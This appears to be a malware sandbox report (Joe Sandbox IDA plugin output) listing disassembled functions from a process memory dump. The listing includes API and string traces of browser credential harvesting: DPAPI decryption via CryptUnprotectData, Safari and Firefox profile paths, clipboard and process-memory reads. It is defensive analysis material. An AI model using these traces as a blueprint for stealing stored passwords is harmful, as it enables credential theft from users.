                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                                                                                                      • String ID: OsError 0x%x (%u)
                                                                                                                                                                                                                      • API String ID: 2360000266-2664311388
                                                                                                                                                                                                                      • Opcode ID: 63f4947bb6e883e354d3d2ebf96ad5df6c46b6e8727c7c07250c00721f9c325d
                                                                                                                                                                                                                      • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 63f4947bb6e883e354d3d2ebf96ad5df6c46b6e8727c7c07250c00721f9c325d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                                                                                                                      Function 0041183A Relevance: 3.0, APIs: 2, Instructions: 44clipboardCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                                                                                                        • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                        • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                      • OpenClipboard.USER32(?), ref: 00411878
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041188D
                                                                                                                                                                                                                        • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                                                        • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                                                        • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                                                        • Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                                                        • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                                                        • Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                                                        • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                                                        • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                                                        • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Clipboard$FileGlobal$CloseTemp$AllocDataDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2628231878-0
                                                                                                                                                                                                                      • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                                                                                                                                                      • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                                                                                                                                                                                                      Function 00401806 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1865533344-0
                                                                                                                                                                                                                      • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                                                                                                                                                      • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                                                                                                                                                      Function 0041739B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Version
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1889659487-0
                                                                                                                                                                                                                      • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                                                                                                                      • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                                                                                                                                                      Function 004018C0 Relevance: 1.5, APIs: 1, Instructions: 6nativeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: NtdllProc_Window
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4255912815-0
                                                                                                                                                                                                                      • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                                                                                      • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                                                                                                                                                      Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                                                                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                                        • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040265F
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                                                                                                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                        • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _wcsicmp$Freememcpy$Library$CryptDataLocalUnprotectmemsetwcslen
                                                                                                                                                                                                                      • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                                                                                      • API String ID: 2257402768-1134094380
                                                                                                                                                                                                                      • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                                                                                                                                                      • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                                                                                                      Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                                                                                      • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                                                                                                      • API String ID: 2787044678-1921111777
                                                                                                                                                                                                                      • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                                                                      • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                                                                                                                                      Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                                                                                      • GetDC.USER32 ref: 004140E3
                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 00414123
                                                                                                                                                                                                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                                                                                      • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                                                                                      • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                                                      • API String ID: 2080319088-3046471546
                                                                                                                                                                                                                      • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                                                                      • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                                                                                                      Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413292
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004132B4
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004132CD
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004132E1
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004132FB
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413310
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                                                                                                      • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004133C0
                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                                                                                                      • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • {Unknown}, xrefs: 004132A6
                                                                                                                                                                                                                      • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                                                                                      • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                                                                                      • API String ID: 4111938811-1819279800
                                                                                                                                                                                                                      • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                                                                                      • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                                                                                                                      Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 0040129E
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 829165378-0
                                                                                                                                                                                                                      • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                                                                      • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                                                                                                                      Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040426E
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004042CD
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004042E2
                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                                                                                      • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                                                                                      • API String ID: 2454223109-1580313836
                                                                                                                                                                                                                      • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                                                      • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                                                                                                      Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                                                                                                      • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                                                                                                                      • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                                                                                                      • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                                                                                                        • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                                                                                                        • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                                                                                                      • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                                                                                                      • API String ID: 4054529287-3175352466
                                                                                                                                                                                                                      • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                                                      • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                                                                                                      Function 00414F1E Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
